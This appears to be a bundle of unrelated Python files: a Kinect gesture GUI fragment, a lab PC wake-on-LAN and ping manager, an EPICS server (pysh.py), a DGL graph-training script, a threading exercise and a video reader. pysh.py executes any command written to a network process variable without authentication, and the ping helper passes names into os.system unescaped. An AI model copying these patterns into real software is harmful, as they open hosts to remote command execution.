def update_gui(self):
self.get_hand_data()
if self.hand_data:
if self.current_widget_number in [1,2]:
area = self.hand_data["right"]["hand_area"]
widget = self.centralWidget()
if (not area == None and self.current_widget_number == 1 or self.current_widget_number == 2):
widget.highlight(area)
if self.current_widget_number == 3:
percent = self.hand_data["right"]["percentage"]
self.widget.percent_to_value(percent)
@pyqtSlot(str, str)
def swipe_detected(self, side, direction):
print(f"{side} Hand: {direction} swipe")
if (side == "left"):
if (direction == "left"):
if self.current_widget_number in [2,3]:
print("returning to last screen")
self.change_frame(self.current_widget_number - 1, self.widget.props[0:-1])
if self.current_widget_number in [4, 1]:
print("returning to main view")
self.change_frame(0)
if (direction == "right"):
if (self.current_widget_number == 0):
self.change_frame(1)
@pyqtSlot(str, str)
def hand_gesture_detected(self, side, gesture):
print(f"{side} Hand: {gesture} detected")
if not self.hand_data:
return
if (side == "right"):
data = self.hand_data[side]
if data["hand_gesture"][0] == "closed":
if not data["hand_gesture"][1] == "closed":
if self.current_widget_number in [1,2]:
area = data["hand_area"]
print(f"selected area {area}")
if not area == None:
self.change_frame(self.current_widget_number+1, self.widget.props + [area])
if self.current_widget_number == 3:
self.widget.entered()
def get_hand_data(self):
try:
self.hand_data = hand_data.get_nowait()
except Empty as e:
pass
def kinect_thread_runner(fps, request_status):
game = kinect.BodyGameRuntime(fps, request_status);
game.swipe_signal.connect(window.swipe_detected)
game.hand_gesture_signal.connect(window.hand_gesture_detected)
while not (game._done or done):
game.run()
if window.current_widget_number == 2:
game.set_disabled_area(window.widget.props[0])
if window.current_widget_number == 1:
game.set_disabled_area(None)
if __name__ == '__main__':
kinect_connected = True
done = False
hand_data = Queue(maxsize=1)
app = QApplication([])
app = global_style.set_style(app)
window = MainWindow()
if kinect_connected:
kinect_thread = threading.Thread(target=kinect_thread_runner, args=(30, hand_data,))
kinect_thread.setDaemon(False)
kinect_thread.start()
window.resize(1920, 1080)
window.show()
timer_opcua = QtCore.QTimer()
timer_opcua.timeout.connect(window.update)
timer_opcua.start(500)
timer_gui = QtCore.QTimer()
timer_gui.timeout.connect(window.update_gui)
timer_gui.start(35)
app.exec()
done = True
|
server.py
|
from awidom import utils
from awidom.utils import CONFIG
from awidom.utils import Ternary
import os
from platform import system as system_name
import PySide.QtCore as QtCore
from PySide.QtCore import QDir
from PySide.QtCore import QPoint
from PySide.QtCore import QSize
import PySide.QtGui as QtGui
import random
import struct
import socket
import sys
import threading
# Runtime globals
class ICONS(object):
ON = 0
OFF = 0
UNKNOWN = 0
class AWIDom(QtGui.QApplication):
"""Handles the whole program."""
def __init__(self, configfile):
"""
Consturct a AWIDOM
Args:
configfile (string, optional): The path to the configuration file.
"""
super().__init__(sys.argv)
self.loadIcons()
self.loadConfig(configfile)
self.settings = QtCore.QSettings()
self.executions = {}
self.createWindow()
def loadConfig(self, configfile):
config = utils.loadYAML(configfile)
self.setApplicationName(config['app_name'])
self.setOrganizationName(config['organisation'])
self.loadPCs(config['client_file'])
CONFIG.BROADCAST_IP = config['broadcast_ip']
CONFIG.NETWORK_DRIVE = config['root_path']
CONFIG.OTREE_EXEC = config['otree_command']
CONFIG.OTREE_URI = config['otree_uri']
def loadPCs(self, clientfile):
clientsconf = utils.loadYAML(clientfile)
self.left = PCList('Left side', self.execute)
self.right = PCList('Right side', self.execute)
[self.left.append(PC(c['id'], c['name'], c['ip'], c['mac']))
for c in clientsconf['left']]
[self.right.append(PC(c['id'], c['name'], c['ip'], c['mac']))
for c in clientsconf['right']]
def loadIcons(self):
pixmap_on = QtGui.QPixmap('./assets/font_awesome_toggle_on.png')
pixmap_off = QtGui.QPixmap('./assets/font_awesome_toggle_off.png')
pixmap_question = QtGui.QPixmap('./assets/font_awesome_question.png')
ICONS.ON = QtGui.QIcon(pixmap_on)
ICONS.OFF = QtGui.QIcon(pixmap_off)
ICONS.UNKNOWN = QtGui.QIcon(pixmap_question)
def createWindow(self):
"""Creates the window for the application without showing/displaying it.
"""
self.mainwindow = MainWindow()
self.mainwindow.createLayout()
self.mainwindow.pclistswidget.addList(self.left)
self.mainwindow.pclistswidget.addList(self.right)
def execute(clients, commands, wait=False):
'''Adds a command to the execution waiting list.
Args:
clients (list(str)): The list of clients to add the command for.
commands (str, list): The command or list of commands to add
wait (bool, optional): Whether to wait with execution until further
notice.
'''
if not isinstance(commands, list):
commands = list(commands)
for client in clients:
if client in self.executions:
self.executions[client].extend(commands)
else:
self.executions[client] = commands
if not wait:
self.flushExecutions()
def flushExecutions():
'''Will save all pending executions to the file so they can be run.'''
pass
def run(self):
"""Showing the constructed window to the user."""
self.mainwindow.show()
class PC(QtGui.QCheckBox):
"""Handles one PC in the lab"""
def __init__(self, id, name, ip, mac):
"""Initalizes the PC
Args:
id (int): The id for this PC
name (str): A string as identifier
ip (str): The IPv4-address
mac (str): the MAC-address of this PC
"""
super().__init__('{}: {}'.format(id, name))
self.id = id
self.name = name
self.ip = ip
self.setMac(mac)
self.setOnline(Ternary.UNKNOWN)
self.isPinging = False
def __lt__(self, other):
"""Less then comparison operator
Args:
other (PC): The other PC
Returns:
self.id < other.id
"""
return self.id < other.id
def __repr__(self):
"""Representation of a PC"""
return repr((self.id, self.name, self.ip, self.mac))
def __str__(self):
"""Nice formatted string output for a PC"""
return ('PC: [id: {}, name: {}, ip: {}, mac: {}]'
''.format(self.id, self.name, self.ip, self.mac))
def setMac(self, mac):
if len(mac) == 12:
pass
elif len(mac) == 12 + 5:
sep = mac[2]
mac = mac.replace(sep, '')
else:
raise ValueError('Incorrect MAC address format')
self.mac = mac
def setOnline(self, status):
self.online = Ternary(status)
self.setOnlineIcon()
def setOnlineIcon(self):
if self.online == Ternary.ON:
self.setIcon(ICONS.ON)
elif self.online == Ternary.OFF:
self.setIcon(ICONS.OFF)
else:
self.setIcon(ICONS.UNKNOWN)
self.setIconSize(QtCore.QSize(16, 16))
def _ping(self):
"""Ping this PC"""
self.isPinging = True
self.setOnline(Ternary.UNKNOWN)
if system_name().lower() == 'windows':
ping_param = '-n 1 {} >nul 2>&1'.format(self.name)
else:
ping_param = '-c 1 {}'.format(self.ip)
print('Pinging {}'.format(self.name))
isOnline = os.system('ping {}'.format(ping_param)) == 0
if isOnline:
self.setOnline(Ternary.ON)
else:
self.setOnline(Ternary.OFF)
self.isPinging = False
return isOnline
def ping(self):
if not self.isPinging:
ping_thread = threading.Thread(target=self._ping)
ping_thread.start()
def _wake(self):
# Pad the synchronization stream.
print('Sending magic packet to {}'.format(self.name))
data = ''.join(['FFFFFFFFFFFF', self.mac * 20])
send_data = b''
# Split up the hex values and pack.
for i in range(0, len(data), 2):
send_data = b''.join([send_data,
struct.pack('B', int(data[i: i + 2], 16))])
# Broadcast it to the LAN.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto(send_data, (CONFIG.BROADCAST_IP, 7))
return True
def wake(self):
if not self.isChecked():
return True
if self.online != Ternary.ON:
self._wake()
self.setOnline(Ternary.UNKNOWN)
# self.checked = False
else:
utils.sendWarning('{} is already alive.'.format(self.name))
class PCList(QtGui.QGroupBox):
"""A List of Buttons/Models of PCs, used to display as a list."""
def __init__(self, title, executer, pc_list=None):
"""Consturcts a new PCList.
Args:
title (str): The Title for the list, will be shown.
executer (function): The function to add command executions for a
list of client PCs
pc_list (list, optional): The List of PCs added to the object.
"""
super().__init__(title)
self.layout = QtGui.QVBoxLayout()
self.executer = executer
if pc_list is not None:
self.load(pc_list)
def __iter__(self):
return iter(self.children())
def load(self, pc_list):
"""Append all PCs in a list to this PCList.
Args:
pc_list (list): A list of PCs.
"""
return [self.append(pc) for pc in pc_list]
def append(self, pc):
"""Append a single pc to the List:
Args:
pc (PC): The pc.
"""
self.layout.addWidget(pc)
pc.ping()
self.setLayout(self.layout)
def selectAll(self):
return [i.setChecked(True) for i in self if isinstance(i, PC)]
def wake(self):
return [i.wake() for i in self if isinstance(i, PC)]
def execute(self, command, wait=False):
clients = [pc for pc in self if isinstance(pc, PC) and pc.isChecked()]
self.executer(clients, command, wait)
def ping(self):
[i.ping() for i in self if isinstance(i, PC) and i.isChecked()]
class PCListsWidget(QtGui.QWidget):
"""A widget to display multiple PCLists side by side."""
def __init__(self):
"""Construct a new PCListsWidget."""
super().__init__()
self.createLayout()
def __iter__(self):
return iter(self.lists.children())
def createLayout(self):
self.layout = QtGui.QVBoxLayout()
self.listsLayout = QtGui.QHBoxLayout()
self.controlsLayout = QtGui.QHBoxLayout()
self.lists = QtGui.QWidget()
self.controls = QtGui.QWidget()
self.lists.setLayout(self.listsLayout)
self.controls.setLayout(self.controlsLayout)
self.layout.addWidget(self.lists)
self.layout.addWidget(self.controls)
self.setLayout(self.layout)
def addList(self, pclist):
"""Add a new PCList to the widget.
Args:
pclist (PCList): The new list
"""
selectAllButton = QtGui.QPushButton('Select all')
selectAllButton.clicked.connect(pclist.selectAll)
self.listsLayout.addWidget(pclist)
self.controlsLayout.addWidget(selectAllButton)
self.lists.setLayout(self.listsLayout)
self.controls.setLayout(self.controlsLayout)
class MainWindow(QtGui.QMainWindow):
def __init__(self):
"""Construct a new MainWindow"""
super().__init__()
self.PCButtonGroup = QtGui.QButtonGroup()
self.executeable = ('','')
def createLayout(self):
self.cwidget = QtGui.QWidget()
self.clayout = QtGui.QVBoxLayout()
self.setCentralWidget(self.cwidget)
self.pclistswidget = PCListsWidget()
self.clayout.addWidget(self.pclistswidget)
self.clayout.addWidget(self.createControls())
self.cwidget.setLayout(self.clayout)
def createControls(self):
controlwidget = QtGui.QWidget()
controllayout = QtGui.QGridLayout()
controllayout.addWidget(self._button('Ping',
self.ping), 0, 0)
controllayout.addWidget(self._button('Wake up',
self.wake), 0, 1)
controllayout.addWidget(self._button('Shutdown',
self.shutdown), 0, 2)
controllayout.addWidget(self._button('Select executeable',
self.commandSelector), 1, 0)
controllayout.addWidget(self._button('Execute',
self.execute), 1, 1)
controllayout.addWidget(self._button('oTree',
self.startOTree), 1, 2)
controlwidget.setLayout(controllayout)
return controlwidget
def _button(self, name, func):
button = QtGui.QPushButton(name)
button.clicked.connect(func)
return button
def ping(self):
return [i.ping() for i in self.pclistswidget if isinstance(i, PCList)]
def execute(self, executeable=None):
if executeable is None:
executeable = self.executeable
return [i.execute(executeable) for i in self.pclistswidget
if isinstance(i, PCList)]
def wake(self):
return [i.wake() for i in self.pclistswidget if isinstance(i, PCList)]
def shutdown(self):
self.execute('shutdown-command')
def commandSelector(self):
e = QtGui.QFileDialog.getOpenFileName(self, 'Find the executeable',
CONFIG.NETWORK_DRIVE,
'')[0]
if system_name().lower() == 'windows':
e = e.replace('/','\\')
self.executeable = e
def startOTree(self):
utils.sendWarning('Not implemented yet!')
# return [i.execute(self.OTREE_EXEC__) for i in self.pclistswidget
# if isinstance(i, PCList)]
def about(self):
pass
|
pysh.py
|
#!/usr/bin/env python
import time
import sys
import threading
import subprocess
import shlex
from pcaspy import Driver, SimpleServer
prefix = 'MTEST:'
pvdb = {
'COMMAND' : {
'type' : 'char',
'count': 128,
'asyn' : True
},
'OUTPUT' : {
'type' : 'char',
'count': 500,
},
'STATUS' : {
'type' : 'enum',
'enums': ['DONE', 'BUSY']
},
'ERROR' : {
'type' : 'string',
},
}
import math
class myDriver(Driver):
def __init__(self):
Driver.__init__(self)
self.tid = None
def write(self, reason, value):
status = True
# take proper actions
if reason == 'COMMAND':
if not self.tid:
command = value
self.tid = threading.Thread(target=self.runShell,args=(command,))
self.tid.start()
else:
status = False
else:
status = False
# store the values
if status:
self.setParam(reason, value)
return status
def runShell(self, command):
print("DEBUG: Run ", command)
# set status BUSY
self.setParam('STATUS', 1)
self.updatePVs()
# run shell
try:
time.sleep(0.01)
proc = subprocess.Popen(shlex.split(command),
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
proc.wait()
except OSError:
self.setParam('ERROR', str(sys.exc_info()[1]))
self.setParam('OUTPUT', '')
else:
self.setParam('ERROR', proc.stderr.read().rstrip())
self.setParam('OUTPUT', proc.stdout.read().rstrip())
self.callbackPV('COMMAND')
# set status DONE
self.setParam('STATUS', 0)
self.updatePVs()
self.tid = None
print("DEBUG: Finish ", command)
if __name__ == '__main__':
server = SimpleServer()
server.createPV(prefix, pvdb)
driver = myDriver()
while True:
# process CA transactions
server.process(0.1)
|
train_cv_multi_gpu.py
|
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import dgl.multiprocessing as mp
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
import tqdm
import traceback
import math
from dgl.data import RedditDataset
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
class SAGEConvWithCV(nn.Module):
def __init__(self, in_feats, out_feats, activation):
super().__init__()
self.W = nn.Linear(in_feats * 2, out_feats)
self.activation = activation
self.reset_parameters()
def reset_parameters(self):
gain = nn.init.calculate_gain('relu')
nn.init.xavier_uniform_(self.W.weight, gain=gain)
nn.init.constant_(self.W.bias, 0)
def forward(self, block, H, HBar=None):
if self.training:
with block.local_scope():
H_src, H_dst = H
HBar_src, agg_HBar_dst = HBar
block.dstdata['agg_hbar'] = agg_HBar_dst
block.srcdata['hdelta'] = H_src - HBar_src
block.update_all(fn.copy_u('hdelta', 'm'), fn.mean('m', 'hdelta_new'))
h_neigh = block.dstdata['agg_hbar'] + block.dstdata['hdelta_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
else:
with block.local_scope():
H_src, H_dst = H
block.srcdata['h'] = H_src
block.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_new'))
h_neigh = block.dstdata['h_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
class SAGE(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation):
super().__init__()
self.n_layers = n_layers
self.n_hidden = n_hidden
self.n_classes = n_classes
self.layers = nn.ModuleList()
self.layers.append(SAGEConvWithCV(in_feats, n_hidden, activation))
for i in range(1, n_layers - 1):
self.layers.append(SAGEConvWithCV(n_hidden, n_hidden, activation))
self.layers.append(SAGEConvWithCV(n_hidden, n_classes, None))
def forward(self, blocks):
h = blocks[0].srcdata['features']
updates = []
for layer, block in zip(self.layers, blocks):
# We need to first copy the representation of nodes on the RHS from the
# appropriate nodes on the LHS.
# Note that the shape of h is (num_nodes_LHS, D) and the shape of h_dst
# would be (num_nodes_RHS, D)
h_dst = h[:block.number_of_dst_nodes()]
hbar_src = block.srcdata['hist']
agg_hbar_dst = block.dstdata['agg_hist']
# Then we compute the updated representation on the RHS.
# The shape of h now becomes (num_nodes_RHS, D)
h = layer(block, (h, h_dst), (hbar_src, agg_hbar_dst))
block.dstdata['h_new'] = h
return h
def inference(self, g, x, batch_size, device):
"""
Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
g : the entire graph.
x : the input of entire node set.
The inference code is written in a fashion that it could handle any number of nodes and
layers.
"""
# During inference with sampling, multi-layer blocks are very inefficient because
# lots of computations in the first few layers are repeated.
# Therefore, we compute the representation of all nodes layer by layer. The nodes
# on each layer are of course splitted in batches.
# TODO: can we standardize this?
nodes = th.arange(g.number_of_nodes())
for l, layer in enumerate(self.layers):
y = g.ndata['hist_%d' % (l + 1)]
for start in tqdm.trange(0, len(nodes), batch_size):
end = start + batch_size
batch_nodes = nodes[start:end]
block = dgl.to_block(dgl.in_subgraph(g, batch_nodes), batch_nodes)
induced_nodes = block.srcdata[dgl.NID]
h = x[induced_nodes].to(device)
block = block.to(device)
h_dst = h[:block.number_of_dst_nodes()]
h = layer(block, (h, h_dst))
y[start:end] = h.cpu()
x = y
return y
class NeighborSampler(object):
def __init__(self, g, fanouts):
self.g = g
self.fanouts = fanouts
def sample_blocks(self, seeds):
seeds = th.LongTensor(seeds)
blocks = []
hist_blocks = []
for fanout in self.fanouts:
# For each seed node, sample ``fanout`` neighbors.
frontier = dgl.sampling.sample_neighbors(self.g, seeds, fanout)
# For history aggregation we sample all neighbors.
hist_frontier = dgl.in_subgraph(self.g, seeds)
# Then we compact the frontier into a bipartite graph for message passing.
block = dgl.to_block(frontier, seeds)
hist_block = dgl.to_block(hist_frontier, seeds)
# Obtain the seed nodes for next layer.
seeds = block.srcdata[dgl.NID]
blocks.insert(0, block)
hist_blocks.insert(0, hist_block)
return blocks, hist_blocks
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
def evaluate(model, g, labels, val_mask, batch_size, device):
"""
Evaluate the model on the validation set specified by ``val_mask``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_mask : A 0-1 mask indicating which nodes do we actually compute the accuracy for.
batch_size : Number of nodes to compute at the same time.
device : The GPU device to evaluate on.
"""
model.eval()
with th.no_grad():
inputs = g.ndata['features']
pred = model.inference(g, inputs, batch_size, device) # also recomputes history tensors
model.train()
return compute_acc(pred[val_mask], labels[val_mask])
def load_subtensor(g, labels, blocks, hist_blocks, dev_id, aggregation_on_device=False):
"""
Copys features and labels of a set of nodes onto GPU.
"""
blocks[0].srcdata['features'] = g.ndata['features'][blocks[0].srcdata[dgl.NID]]
blocks[-1].dstdata['label'] = labels[blocks[-1].dstdata[dgl.NID]]
ret_blocks = []
ret_hist_blocks = []
for i, (block, hist_block) in enumerate(zip(blocks, hist_blocks)):
hist_col = 'features' if i == 0 else 'hist_%d' % i
block.srcdata['hist'] = g.ndata[hist_col][block.srcdata[dgl.NID]]
# Aggregate history
hist_block.srcdata['hist'] = g.ndata[hist_col][hist_block.srcdata[dgl.NID]]
if aggregation_on_device:
hist_block = hist_block.to(dev_id)
hist_block.srcdata['hist'] = hist_block.srcdata['hist']
hist_block.update_all(fn.copy_u('hist', 'm'), fn.mean('m', 'agg_hist'))
block = block.to(dev_id)
if not aggregation_on_device:
hist_block = hist_block.to(dev_id)
block.dstdata['agg_hist'] = hist_block.dstdata['agg_hist']
ret_blocks.append(block)
ret_hist_blocks.append(hist_block)
return ret_blocks, ret_hist_blocks
def create_history_storage(g, args, n_classes):
# Initialize history storage
for l in range(args.num_layers):
dim = args.num_hidden if l != args.num_layers - 1 else n_classes
g.ndata['hist_%d' % (l + 1)] = th.zeros(g.number_of_nodes(), dim).share_memory_()
def init_history(g, model, dev_id, batch_size):
with th.no_grad():
model.inference(g, g.ndata['features'], batch_size, dev_id) # replaces hist_i features in-place
def update_history(g, blocks):
with th.no_grad():
for i, block in enumerate(blocks):
ids = block.dstdata[dgl.NID].cpu()
hist_col = 'hist_%d' % (i + 1)
h_new = block.dstdata['h_new'].cpu()
g.ndata[hist_col][ids] = h_new
def run(proc_id, n_gpus, args, devices, data):
dropout = 0.2
dev_id = devices[proc_id]
if n_gpus > 1:
dist_init_method = 'tcp://{master_ip}:{master_port}'.format(
master_ip='127.0.0.1', master_port='12345')
world_size = n_gpus
th.distributed.init_process_group(backend="nccl",
init_method=dist_init_method,
world_size=world_size,
rank=proc_id)
th.cuda.set_device(dev_id)
# Unpack data
train_mask, val_mask, in_feats, labels, n_classes, g = data
train_nid = train_mask.nonzero().squeeze()
val_nid = val_mask.nonzero().squeeze()
# Create sampler
sampler = NeighborSampler(g, [int(_) for _ in args.fan_out.split(',')])
# Create PyTorch DataLoader for constructing blocks
if n_gpus > 1:
dist_sampler = th.utils.data.distributed.DistributedSampler(train_nid.numpy(), shuffle=True, drop_last=False)
dataloader = DataLoader(
dataset=train_nid.numpy(),
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
sampler=dist_sampler,
num_workers=args.num_workers_per_gpu)
else:
dataloader = DataLoader(
dataset=train_nid.numpy(),
batch_size=args.batch_size,
collate_fn=sampler.sample_blocks,
shuffle=True,
drop_last=False,
num_workers=args.num_workers_per_gpu)
# Define model
model = SAGE(in_feats, args.num_hidden, n_classes, args.num_layers, F.relu)
# Move the model to GPU and define optimizer
model = model.to(dev_id)
if n_gpus > 1:
model = DistributedDataParallel(model, device_ids=[dev_id], output_device=dev_id)
loss_fcn = nn.CrossEntropyLoss()
loss_fcn = loss_fcn.to(dev_id)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
# Compute history tensor and their aggregation before training on CPU
model.eval()
if n_gpus > 1:
if proc_id == 0:
init_history(g, model.module, dev_id, args.val_batch_size)
th.distributed.barrier()
else:
init_history(g, model, dev_id, args.val_batch_size)
model.train()
# Training loop
avg = 0
iter_tput = []
for epoch in range(args.num_epochs):
if n_gpus > 1:
dist_sampler.set_epoch(epoch)
tic = time.time()
model.train()
for step, (blocks, hist_blocks) in enumerate(dataloader):
if proc_id == 0:
tic_step = time.time()
# The nodes for input lies at the LHS side of the first block.
# The nodes for output lies at the RHS side of the last block.
seeds = blocks[-1].dstdata[dgl.NID]
blocks, hist_blocks = load_subtensor(g, labels, blocks, hist_blocks, dev_id, True)
# forward
batch_pred = model(blocks)
# update history
update_history(g, blocks)
# compute loss
batch_labels = blocks[-1].dstdata['label']
loss = loss_fcn(batch_pred, batch_labels)
# backward
optimizer.zero_grad()
loss.backward()
optimizer.step()
if proc_id == 0:
iter_tput.append(len(seeds) * n_gpus / (time.time() - tic_step))
if step % args.log_every == 0 and proc_id == 0:
acc = compute_acc(batch_pred, batch_labels)
print('Epoch {:05d} | Step {:05d} | Loss {:.4f} | Train Acc {:.4f} | Speed (samples/sec) {:.4f}'.format(
epoch, step, loss.item(), acc.item(), np.mean(iter_tput[3:])))
if n_gpus > 1:
th.distributed.barrier()
toc = time.time()
if proc_id == 0:
print('Epoch Time(s): {:.4f}'.format(toc - tic))
if epoch >= 5:
avg += toc - tic
if epoch % args.eval_every == 0 and epoch != 0:
model.eval()
eval_acc = evaluate(
model if n_gpus == 1 else model.module, g, labels, val_nid, args.val_batch_size, dev_id)
print('Eval Acc {:.4f}'.format(eval_acc))
if n_gpus > 1:
th.distributed.barrier()
if proc_id == 0:
print('Avg epoch time: {}'.format(avg / (epoch - 4)))
if __name__ == '__main__':
argparser = argparse.ArgumentParser("multi-gpu training")
argparser.add_argument('--gpu', type=str, default='0')
argparser.add_argument('--num-epochs', type=int, default=20)
argparser.add_argument('--num-hidden', type=int, default=16)
argparser.add_argument('--num-layers', type=int, default=2)
argparser.add_argument('--fan-out', type=str, default='1,1')
argparser.add_argument('--batch-size', type=int, default=1000)
argparser.add_argument('--val-batch-size', type=int, default=1000)
argparser.add_argument('--log-every', type=int, default=20)
argparser.add_argument('--eval-every', type=int, default=5)
argparser.add_argument('--lr', type=float, default=0.003)
argparser.add_argument('--num-workers-per-gpu', type=int, default=0)
args = argparser.parse_args()
devices = list(map(int, args.gpu.split(',')))
n_gpus = len(devices)
# load reddit data
data = RedditDataset(self_loop=True)
n_classes = data.num_classes
g = data[0]
features = g.ndata['feat']
in_feats = features.shape[1]
labels = g.ndata['label']
train_mask = g.ndata['train_mask']
val_mask = g.ndata['val_mask']
g.ndata['features'] = features.share_memory_()
create_history_storage(g, args, n_classes)
# Create csr/coo/csc formats before launching training processes with multi-gpu.
# This avoids creating certain formats in each sub-process, which saves momory and CPU.
g.create_formats_()
# Pack data
data = train_mask, val_mask, in_feats, labels, n_classes, g
if n_gpus == 1:
run(0, n_gpus, args, devices, data)
else:
procs = []
for proc_id in range(n_gpus):
p = mp.Process(target=run, args=(proc_id, n_gpus, args, devices, data))
p.start()
procs.append(p)
for p in procs:
p.join()
|
training_threading.py
|
# Тренировка использования пакета threading
import random
import time
import threading
class SolveFactorial:
def __init__(self):
self.answer = 0
def handler_solve_fact_async(self, fact: int):
answer = str(fact) + '! = ' + str(self.solve_fact(fact))
print(answer, end='\n')
def solve_fact(self, fact: int):
factorial: int = fact
if factorial > 0:
if factorial > 1:
factorial * self.solve_fact(factorial - 1) # Это нужно для замедления работы потока
return factorial * self.solve_fact(factorial - 1)
else:
return 1
else:
return 0
def solve_fact_async(self, fact: int):
factorial = fact
x = threading.Thread(target=self.handler_solve_fact_async, args=(factorial,))
x.start()
return 0
def main():
solver = SolveFactorial()
for i in range(10):
number = input('\nКакой факториал нужен?')
try:
solver.solve_fact_async(int(number))
except Exception:
print('error!')
return 1
return 0
if __name__ == '__main__':
main()
|
video_capture.py
|
"""
Ffmpeg-based video file reader with timestamp support and optional GPU decoding
"""
import os
import re
import time
import cv2
from typing import Union, Tuple
import numpy as np
import bisect
import subprocess
import threading
import logging
logger = logging.getLogger()
class YUV2RGB_GPU():
"""
High performance YUV - RGB conversion with Tensorflow
"""
def __init__(self, w=1920, h=1080):
config = tf.ConfigProto(gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.03))
self.y = tf.placeholder(shape=(1, h, w), dtype=tf.float32)
self.u = tf.placeholder(shape=(1, h, w), dtype=tf.float32)
self.v = tf.placeholder(shape=(1, h, w), dtype=tf.float32)
r = self.y + 1.371 * (self.v - 128)
g = self.y + 0.338 * (self.u - 128) - 0.698 * (self.v - 128)
b = self.y + 1.732 * (self.u - 128)
result = tf.stack([b, g, r], axis=-1)
self.result = tf.clip_by_value(result, 0, 255)
self.sess = tf.Session(config=config)
def convert(self, y, u, v):
results = self.sess.run(self.result, feed_dict={self.y: y, self.u: u, self.v: v})
return results.astype(np.uint8)
class VideoCapture:
# how many times to poll for timestamp availability before generating error
MAX_TIMESTAMP_WAIT = 100
TIMESTAMP_POLL_INTERVAL = 0.01
class FrameData:
"""
Object holding pixel data and metadata
"""
def __init__(self, index: int, timestamp: float, frame: np.ndarray):
self.frame = frame
self.index = index
self.timestamp = timestamp
def __init__(self, filename: str, use_gpu=False, video_reader: str = 'opencv'):
"""
@param filename:
@param use_gpu:
@param video_reader: 'ffmpeg_bgr' - read video with ffmpeg bgr24 output, warning: Ffmpeg has some color conversion issue which adds irregular noise to pixel data
'ffmpeg_yuv' - read video with ffmpeg yuv420p output, slower, requires tensorflow
'opencv' - read video with opencv, and use ffmpeg only for reading timestamps, fastest, but scans video 2 times
"""
if not os.path.exists(filename):
raise ValueError(f'File {filename} doesn\'t exist')
if video_reader not in ['ffmpeg_bgr', 'ffmpeg_yuv', 'opencv']:
raise ValueError(f'Unknown video reader type {video_reader}')
logger.info(f'Video reader is: {video_reader}')
if video_reader == 'ffmpeg_yuv':
global tf
import tensorflow as tf
self.pixel_converter = YUV2RGB_GPU(self.width, self.height)
self.video_reader = video_reader
self.ts_reader_thread: threading.Thread
self.filename = filename
self.started = False
self.stopping = False
self.timestamps = []
self.frame_idx = -1
self.stream_data_read = False
self.ffmpeg_decoder = ''
self.offset = 0
self.opencv_capture = None
self.last_frame_data = None
if use_gpu:
# Nvcodec sometimes duplicates frames producing more frames than it\'s actually in the video. In tests, it happened only at the end of the video, but potentially it can corrupt timestamps
self.ffmpeg_decoder = '-hwaccel nvdec -c:v h264_cuvid'
# this enables GPU codec for Ffmpeg libs used by OpenCV
if 'opencv' in video_reader:
os.environ['OPENCV_FFMPEG_CAPTURE_OPTIONS'] = 'video_codec;h264_cuvid'
logger.warning('For OpenCV+Ffmpeg GPU acceleration to work, config environment variable must be set before the first cv2 import')
if 'opencv' in video_reader:
if not (cv2.getVersionMajor() >= 4 and cv2.getVersionMinor() >= 2):
raise Exception('Can\'t use OpenCV to read video - minimum required version of opencv-python is 4.2')
self._read_metadata()
def _read_metadata(self):
"""
Reads video properties and fills corresponding fields
@return:
"""
cap = None
try:
cap = cv2.VideoCapture(self.filename, cv2.CAP_FFMPEG)
self.fps = cap.get(cv2.CAP_PROP_FPS)
self.width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.frame_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
if self.video_reader == 'opencv':
self.opencv_capture = cap
logger.info(f'Video file opened {self.filename}, {self.width}x{self.height}, {self.fps} FPS')
finally:
if cap is not None and self.video_reader != 'opencv':
cap.release()
def _read_next_frame(self, grab=False):
if self.video_reader == 'ffmpeg_yuv':
# get raw frame from stdout and convert it to numpy array
bytes = self.video_capture.stdout.read(int(self.height * self.width * 6 // 4))
if len(bytes) == 0:
return None
k = self.height * self.width
y = np.frombuffer(bytes[0:k], dtype=np.uint8).reshape((self.height, self.width))
u = np.frombuffer(bytes[k:k + k // 4], dtype=np.uint8).reshape((self.height // 2, self.width // 2))
v = np.frombuffer(bytes[k + k // 4:], dtype=np.uint8).reshape((self.height // 2, self.width // 2))
u = np.reshape(cv2.resize(np.expand_dims(u, -1), (self.width, self.height)), (self.height, self.width))
v = np.reshape(cv2.resize(np.expand_dims(v, -1), (self.width, self.height)), (self.height, self.width))
return self.pixel_converter.convert([y], [u], [v])[0]
elif self.video_reader == 'ffmpeg_bgr':
bytes = self.video_capture.stdout.read(int(self.height * self.width * 3))
if len(bytes) == 0:
return None
return np.frombuffer(bytes, np.uint8).reshape([self.height, self.width, 3])
elif self.video_reader == 'opencv':
if not grab:
return self.opencv_capture.read()[1]
else:
return self.opencv_capture.grab()
def read(self, grab=False) -> Union[FrameData, None]:
"""
Reads next frame from video.
@param grab: Works for OpenCV reader only. If true, doesn't decode the frame, it will be empty in FrameData object. Use retrieve() to get frame data.
@return:
@return: Tuple[frame_index, frame_timestamp, frame] or [None, None, None] if end of video
"""
if not self.started:
self.start()
frame = self._read_next_frame(grab)
if frame is None or (grab and isinstance(frame, bool) and frame == False):
return None
self.frame_idx += 1
if 0 < self.frame_count == self.frame_idx:
logger.error(f'Frame count mismatch, possibly corrupted video file: {self.filename}')
self.release()
return None
timestamp = self._get_timestamp_for_frame(self.frame_idx)
logger.debug(f'Read frame {self.frame_idx} at PTS_TIME {timestamp}')
